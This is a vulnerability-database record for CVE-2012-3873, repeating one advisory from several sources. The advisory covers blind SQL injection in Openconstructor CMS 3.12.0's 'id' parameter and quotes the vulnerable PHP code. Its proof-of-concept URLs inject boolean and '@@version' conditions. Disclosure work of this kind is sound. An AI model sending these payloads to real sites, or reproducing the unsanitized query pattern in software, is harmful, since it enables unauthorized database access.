{"href": "https://www.seebug.org/vuldb/ssvid-74228", "status": "cve,poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "Openconstructor CMS 3.12.0 \\'id\\' Parameter Multiple SQL Injection", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 6.5}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-74228", "cvelist": ["CVE-2012-3873"], "description": "No description provided by source.", "viewCount": 3, "published": "2014-07-01T00:00:00", "sourceData": "\n ###Title###: \r\nOpenconstructor CMS 3.12.0 'id' parameter multiple SQL injection vulnerabilities\r\n\r\n\r\n###Affected Software###:\r\nhttp://www.openconstructor.org/\r\nhttp://code.google.com/p/openconstructor/downloads/list\r\nhttp://esectorsolutions.com/about/whats-new/esector-news/detailed/?id=234\r\n\r\n\r\n###Description###: \r\nOpenconstructor (formerly known as eSector Solutions Web Constructor) is an open source web Content Management System written in PHP.\r\nMultiple SQL injection vulnerabilities exist on the 'id' parameter, which is used across different sections of the application. \r\nVerson 3.12.0 is vulnerable, previous version may be affected, but they have not been tested.\r\n\r\n###CVE###\r\nCVE-2012-3873\r\n\r\n\r\n###Impact###: \r\nAuthenticated attackers can execute arbitrary SQL queries.\r\n\r\nCVSS Base Score: 9.0 (AV:N/AC:L/Au:S/C:C/I:C/A:C)\r\n\r\n\r\n###Credits###:\r\nLorenzo Cantoni \r\n\r\n\r\n###Details###:\r\nThe following lines of code are the cause of the issue:\r\n\r\n ds->get_record($_GET['id'])\r\n\r\nget_record() perform a query on the database, without checking the user supplied data in the 'id' parameter. The following pages are vulnerable:\r\n\r\ndata/gallery/edit.php\r\ndata/guestbook/edit.php\r\ndata/file/edit.php\r\ndata/htmltext/edit.php\r\ndata/publication/edit.php\r\ndata/event/edit.php\r\n\r\n'getimage/showimage.php' is also vulnerable, due to the following lines of code:\r\n\r\n$res = $db->query(\r\n 'SELECT id, name, filename, size, type, date'.\r\n ' FROM dsfile'.\r\n ' WHERE id='.$_GET['id']\r\n );\r\n\r\n\r\n###Proof of Concept###:\r\nAn object (eg:gallery object, file object, guestbook object ...) must first be created or has to already exist in order to exploit the vulnerability.\r\nFor instance, if a guestbook object has been created, an attacker can open it in edit page and exploit a blind SQL injection as follows:\r\n\r\nhttp://hostname/openconstructor/data/guestbook/edit.php?ds_id=1&id=4 AND 1=1 #returns a TRUE value for the query\r\nhttp://hostname/openconstructor/data/guestbook/edit.php?ds_id=1&id=4 AND 1=1 #returns a FALSE value for the query\r\n\r\nIn my test environment, I have been able to confirm the possibility to execute queries with the following commands:\r\n\r\nhttp://hostname/openconstructor/data/guestbook/edit.php?ds_id=10&id=4 AND (select @@version)='5.5.16-log' #returns a TRUE value for the query\r\nhttp://hostname/openconstructor/data/guestbook/edit.php?ds_id=10&id=4 AND (select @@version)='5.5.16-foo' #returns a FALSE value for the query\r\n\r\nOn 'getimage/showimage.php', an image file must be first successfully uploaded. The exploitation is very similar:\r\n\r\nhttp://hostname/openconstructor/getimage/showimage.php?id=1%20AND%20(select%20@@version)='5.5.16-foo' # returns a FALSE value for the query\r\nhttp://hostname/openconstructor/getimage/showimage.php?id=1%20AND%20(select%20@@version)='5.5.16-log' # return a TRUE value for the query\r\n\r\n\r\n###Disclosure###\r\n[08/07/2012] Lead Developer contacted.\r\n[22/07/2012] No response. Sent another mail.\r\n[04/08/2012] Still no response. Public disclosure.\n ", "id": "SSV:74228", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T17:14:56", "reporter": "Root", "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-3873"]}, {"type": "exploitdb", "idList": ["EDB-ID:20347"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:E95645766EF7221F8E54B4FE521128F3"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:115286"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28375"]}]}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2012-3873"]}, {"type": "exploitdb", "idList": ["EDB-ID:20347"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:E95645766EF7221F8E54B4FE521128F3"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28375"]}]}, "exploitation": null, "vulnersScore": 0.5}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660016219, "score": 1660016489}, "_internal": {"score_hash": "4d037c3975bcb320eb419f6e1182b308"}}
{"securityvulns": [{"lastseen": "2018-08-31T11:10:45", "bulletinFamily": "software", "cvelist": ["CVE-2012-3873"], "description": "\r\n\r\n###Title###: \r\nOpenconstructor CMS 3.12.0 'id' parameter multiple SQL injection vulnerabilities\r\n\r\n\r\n###Affected Software###:\r\nhttp://www.openconstructor.org/\r\nhttp://code.google.com/p/openconstructor/downloads/list\r\nhttp://esectorsolutions.com/about/whats-new/esector-news/detailed/?id=234\r\n\r\n\r\n###Description###: \r\nOpenconstructor (formerly known as eSector Solutions Web Constructor) is an open source web Content Management System written in PHP.\r\nMultiple SQL injection vulnerabilities exist on the 'id' parameter, which is used across different sections of the application. \r\nVerson 3.12.0 is vulnerable, previous version may be affected, but they have not been tested.\r\n\r\n###CVE###\r\nCVE-2012-3873\r\n\r\n\r\n###Impact###: \r\nAuthenticated attackers can execute arbitrary SQL queries.\r\n\r\nCVSS Base Score: 9.0 (AV:N/AC:L/Au:S/C:C/I:C/A:C)\r\n\r\n\r\n###Credits###:\r\nLorenzo Cantoni \r\n\r\n\r\n###Details###:\r\nThe following lines of code are the cause of the issue:\r\n\r\n\tds->get_record($_GET['id'])\r\n\r\nget_record() perform a query on the database, without checking the user supplied data in the 'id' parameter. The following pages are vulnerable:\r\n\r\ndata/gallery/edit.php\r\ndata/guestbook/edit.php\r\ndata/file/edit.php\r\ndata/htmltext/edit.php\r\ndata/publication/edit.php\r\ndata/event/edit.php\r\n\r\n'getimage/showimage.php' is also vulnerable, due to the following lines of code:\r\n\r\n$res = $db->query(\r\n 'SELECT id, name, filename, size, type, date'.\r\n ' FROM dsfile'.\r\n ' WHERE id='.$_GET['id']\r\n\t\t);\r\n\r\n\r\n###Proof of Concept###:\r\nAn object (eg:gallery object, file object, guestbook object ...) must first be created or has to already exist in order to exploit the vulnerability.\r\nFor instance, if a guestbook object has been created, an attacker can open it in edit page and exploit a blind SQL injection as follows:\r\n\r\nhttp://hostname/openconstructor/data/guestbook/edit.php?ds_id=1&id=4 AND 1=1 #returns a TRUE value for the query\r\nhttp://hostname/openconstructor/data/guestbook/edit.php?ds_id=1&id=4 AND 1=1 #returns a FALSE value for the query\r\n\r\nIn my test environment, I have been able to confirm the possibility to execute queries with the following commands:\r\n\r\nhttp://hostname/openconstructor/data/guestbook/edit.php?ds_id=10&id=4 AND (select @@version)='5.5.16-log' #returns a TRUE value for the query\r\nhttp://hostname/openconstructor/data/guestbook/edit.php?ds_id=10&id=4 AND (select @@version)='5.5.16-foo' #returns a FALSE value for the query\r\n\r\nOn 'getimage/showimage.php', an image file must be first successfully uploaded. The exploitation is very similar:\r\n\r\nhttp://hostname/openconstructor/getimage/showimage.php?id=1%20AND%20(select%20@@version)='5.5.16-foo' # returns a FALSE value for the query\r\nhttp://hostname/openconstructor/getimage/showimage.php?id=1%20AND%20(select%20@@version)='5.5.16-log' # return a TRUE value for the query\r\n\r\n\r\n###Disclosure###\r\n[08/07/2012] Lead Developer contacted.\r\n[22/07/2012] No response. Sent another mail.\r\n[04/08/2012] Still no response. Public disclosure.\r\n", "edition": 1, "modified": "2012-08-13T00:00:00", "published": "2012-08-13T00:00:00", "id": "SECURITYVULNS:DOC:28375", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28375", "title": "[CVE-2012-3873] Openconstructor CMS 3.12.0 'id' parameter multiple SQL injection vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOpenconstructor CMS 3.12.0 - id Multiple SQL Injections", "edition": 2, "published": "2012-08-08T00:00:00", "title": "Openconstructor CMS 3.12.0 - id Multiple SQL Injections", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-3873"], "modified": "2012-08-08T00:00:00", "id": "EXPLOITPACK:E95645766EF7221F8E54B4FE521128F3", "href": "", "sourceData": "###Title###: \nOpenconstructor CMS 3.12.0 'id' parameter multiple SQL injection vulnerabilities\n\n\n###Affected Software###:\nhttp://www.openconstructor.org/\nhttp://code.google.com/p/openconstructor/downloads/list\nhttp://esectorsolutions.com/about/whats-new/esector-news/detailed/?id=234\n\n\n###Description###: \nOpenconstructor (formerly known as eSector Solutions Web Constructor) is an open source web Content Management System written in PHP.\nMultiple SQL injection vulnerabilities exist on the 'id' parameter, which is used across different sections of the application. \nVerson 3.12.0 is vulnerable, previous version may be affected, but they have not been tested.\n\n###CVE###\nCVE-2012-3873\n\n\n###Impact###: \nAuthenticated attackers can execute arbitrary SQL queries.\n\nCVSS Base Score: 9.0 (AV:N/AC:L/Au:S/C:C/I:C/A:C)\n\n\n###Credits###:\nLorenzo Cantoni \n\n\n###Details###:\nThe following lines of code are the cause of the issue:\n\n ds->get_record($_GET['id'])\n\nget_record() perform a query on the database, without checking the user supplied data in the 'id' parameter. The following pages are vulnerable:\n\ndata/gallery/edit.php\ndata/guestbook/edit.php\ndata/file/edit.php\ndata/htmltext/edit.php\ndata/publication/edit.php\ndata/event/edit.php\n\n'getimage/showimage.php' is also vulnerable, due to the following lines of code:\n\n$res = $db->query(\n 'SELECT id, name, filename, size, type, date'.\n ' FROM dsfile'.\n ' WHERE id='.$_GET['id']\n );\n\n\n###Proof of Concept###:\nAn object (eg:gallery object, file object, guestbook object ...) must first be created or has to already exist in order to exploit the vulnerability.\nFor instance, if a guestbook object has been created, an attacker can open it in edit page and exploit a blind SQL injection as follows:\n\nhttp://hostname/openconstructor/data/guestbook/edit.php?ds_id=1&id=4 AND 1=1 #returns a TRUE value for the query\nhttp://hostname/openconstructor/data/guestbook/edit.php?ds_id=1&id=4 AND 1=1 #returns a FALSE value for the query\n\nIn my test environment, I have been able to confirm the possibility to execute queries with the following commands:\n\nhttp://hostname/openconstructor/data/guestbook/edit.php?ds_id=10&id=4 AND (select @@version)='5.5.16-log' #returns a TRUE value for the query\nhttp://hostname/openconstructor/data/guestbook/edit.php?ds_id=10&id=4 AND (select @@version)='5.5.16-foo' #returns a FALSE value for the query\n\nOn 'getimage/showimage.php', an image file must be first successfully uploaded. The exploitation is very similar:\n\nhttp://hostname/openconstructor/getimage/showimage.php?id=1%20AND%20(select%20@@version)='5.5.16-foo' # returns a FALSE value for the query\nhttp://hostname/openconstructor/getimage/showimage.php?id=1%20AND%20(select%20@@version)='5.5.16-log' # return a TRUE value for the query\n\n\n###Disclosure###\n[08/07/2012] Lead Developer contacted.\n[22/07/2012] No response. Sent another mail.\n[04/08/2012] Still no response. Public disclosure.", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:24", "description": "", "published": "2012-08-04T00:00:00", "type": "packetstorm", "title": "Openconstructor CMS 3.12.0 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-3873"], "modified": "2012-08-04T00:00:00", "id": "PACKETSTORM:115286", "href": "https://packetstormsecurity.com/files/115286/Openconstructor-CMS-3.12.0-SQL-Injection.html", "sourceData": "`###Title###: \nOpenconstructor CMS 3.12.0 'id' parameter multiple SQL injection vulnerabilities \n \n \n###Affected Software###: \nhttp://www.openconstructor.org/ \nhttp://code.google.com/p/openconstructor/downloads/list \nhttp://esectorsolutions.com/about/whats-new/esector-news/detailed/?id=234 \n \n \n###Description###: \nOpenconstructor (formerly known as eSector Solutions Web Constructor) is an open source web Content Management System written in PHP. \nMultiple SQL injection vulnerabilities exist on the 'id' parameter, which is used across different sections of the application. \nVerson 3.12.0 is vulnerable, previous version may be affected, but they have not been tested. \n \n###CVE### \nCVE-2012-3873 \n \n \n###Impact###: \nAuthenticated attackers can execute arbitrary SQL queries. \n \nCVSS Base Score: 9.0 (AV:N/AC:L/Au:S/C:C/I:C/A:C) \n \n \n###Credits###: \nLorenzo Cantoni \n \n \n###Details###: \nThe following lines of code are the cause of the issue: \n \nds->get_record($_GET['id']) \n \nget_record() perform a query on the database, without checking the user supplied data in the 'id' parameter. The following pages are vulnerable: \n \ndata/gallery/edit.php \ndata/guestbook/edit.php \ndata/file/edit.php \ndata/htmltext/edit.php \ndata/publication/edit.php \ndata/event/edit.php \n \n'getimage/showimage.php' is also vulnerable, due to the following lines of code: \n \n$res = $db->query( \n'SELECT id, name, filename, size, type, date'. \n' FROM dsfile'. \n' WHERE id='.$_GET['id'] \n); \n \n \n###Proof of Concept###: \nAn object (eg:gallery object, file object, guestbook object ...) must first be created or has to already exist in order to exploit the vulnerability. \nFor instance, if a guestbook object has been created, an attacker can open it in edit page and exploit a blind SQL injection as follows: \n \nhttp://hostname/openconstructor/data/guestbook/edit.php?ds_id=1&id=4 AND 1=1 #returns a TRUE value for the query \nhttp://hostname/openconstructor/data/guestbook/edit.php?ds_id=1&id=4 AND 1=1 #returns a FALSE value for the query \n \nIn my test environment, I have been able to confirm the possibility to execute queries with the following commands: \n \nhttp://hostname/openconstructor/data/guestbook/edit.php?ds_id=10&id=4 AND (select @@version)='5.5.16-log' #returns a TRUE value for the query \nhttp://hostname/openconstructor/data/guestbook/edit.php?ds_id=10&id=4 AND (select @@version)='5.5.16-foo' #returns a FALSE value for the query \n \nOn 'getimage/showimage.php', an image file must be first successfully uploaded. The exploitation is very similar: \n \nhttp://hostname/openconstructor/getimage/showimage.php?id=1%20AND%20(select%20@@version)='5.5.16-foo' # returns a FALSE value for the query \nhttp://hostname/openconstructor/getimage/showimage.php?id=1%20AND%20(select%20@@version)='5.5.16-log' # return a TRUE value for the query \n \n \n###Disclosure### \n[08/07/2012] Lead Developer contacted. \n[22/07/2012] No response. Sent another mail. \n[04/08/2012] Still no response. Public disclosure. \n`\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/115286/openconstructor3120-sql.txt"}], "cve": [{"lastseen": "2022-03-23T12:45:38", "description": "Multiple SQL injection vulnerabilities in Open Constructor 3.12.0 allow remote authenticated users to execute arbitrary SQL commands via the id parameter to (1) data/gallery/edit.php, (2) data/guestbook/edit.php, (3) data/file/edit.php, (4) data/htmltext/edit.php, (5) data/publication/edit.php, or (6) data/event/edit.php.", "cvss3": {}, "published": "2012-12-28T11:48:00", "type": "cve", "title": "CVE-2012-3873", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-3873"], "modified": "2012-12-28T15:09:00", "cpe": ["cpe:/a:openconstructor_project:openconstructor:3.12.0"], "id": "CVE-2012-3873", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3873", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:openconstructor_project:openconstructor:3.12.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-08-16T09:02:29", "description": "", "cvss3": {}, "published": "2012-08-08T00:00:00", "type": "exploitdb", "title": "Openconstructor CMS 3.12.0 - 'id' Multiple SQL Injections", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2012-3873", "CVE-2012-3873"], "modified": "2012-08-08T00:00:00", "id": "EDB-ID:20347", "href": "https://www.exploit-db.com/exploits/20347", "sourceData": "###Title###: \r\nOpenconstructor CMS 3.12.0 'id' parameter multiple SQL injection vulnerabilities\r\n\r\n\r\n###Affected Software###:\r\nhttp://www.openconstructor.org/\r\nhttp://code.google.com/p/openconstructor/downloads/list\r\nhttp://esectorsolutions.com/about/whats-new/esector-news/detailed/?id=234\r\n\r\n\r\n###Description###: \r\nOpenconstructor (formerly known as eSector Solutions Web Constructor) is an open source web Content Management System written in PHP.\r\nMultiple SQL injection vulnerabilities exist on the 'id' parameter, which is used across different sections of the application. \r\nVerson 3.12.0 is vulnerable, previous version may be affected, but they have not been tested.\r\n\r\n###CVE###\r\nCVE-2012-3873\r\n\r\n\r\n###Impact###: \r\nAuthenticated attackers can execute arbitrary SQL queries.\r\n\r\nCVSS Base Score: 9.0 (AV:N/AC:L/Au:S/C:C/I:C/A:C)\r\n\r\n\r\n###Credits###:\r\nLorenzo Cantoni \r\n\r\n\r\n###Details###:\r\nThe following lines of code are the cause of the issue:\r\n\r\n ds->get_record($_GET['id'])\r\n\r\nget_record() perform a query on the database, without checking the user supplied data in the 'id' parameter. The following pages are vulnerable:\r\n\r\ndata/gallery/edit.php\r\ndata/guestbook/edit.php\r\ndata/file/edit.php\r\ndata/htmltext/edit.php\r\ndata/publication/edit.php\r\ndata/event/edit.php\r\n\r\n'getimage/showimage.php' is also vulnerable, due to the following lines of code:\r\n\r\n$res = $db->query(\r\n 'SELECT id, name, filename, size, type, date'.\r\n ' FROM dsfile'.\r\n ' WHERE id='.$_GET['id']\r\n );\r\n\r\n\r\n###Proof of Concept###:\r\nAn object (eg:gallery object, file object, guestbook object ...) must first be created or has to already exist in order to exploit the vulnerability.\r\nFor instance, if a guestbook object has been created, an attacker can open it in edit page and exploit a blind SQL injection as follows:\r\n\r\nhttp://hostname/openconstructor/data/guestbook/edit.php?ds_id=1&id=4 AND 1=1 #returns a TRUE value for the query\r\nhttp://hostname/openconstructor/data/guestbook/edit.php?ds_id=1&id=4 AND 1=1 #returns a FALSE value for the query\r\n\r\nIn my test environment, I have been able to confirm the possibility to execute queries with the following commands:\r\n\r\nhttp://hostname/openconstructor/data/guestbook/edit.php?ds_id=10&id=4 AND (select @@version)='5.5.16-log' #returns a TRUE value for the query\r\nhttp://hostname/openconstructor/data/guestbook/edit.php?ds_id=10&id=4 AND (select @@version)='5.5.16-foo' #returns a FALSE value for the query\r\n\r\nOn 'getimage/showimage.php', an image file must be first successfully uploaded. The exploitation is very similar:\r\n\r\nhttp://hostname/openconstructor/getimage/showimage.php?id=1%20AND%20(select%20@@version)='5.5.16-foo' # returns a FALSE value for the query\r\nhttp://hostname/openconstructor/getimage/showimage.php?id=1%20AND%20(select%20@@version)='5.5.16-log' # return a TRUE value for the query\r\n\r\n\r\n###Disclosure###\r\n[08/07/2012] Lead Developer contacted.\r\n[22/07/2012] No response. Sent another mail.\r\n[04/08/2012] Still no response. Public disclosure.", "sourceHref": "https://www.exploit-db.com/download/20347", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}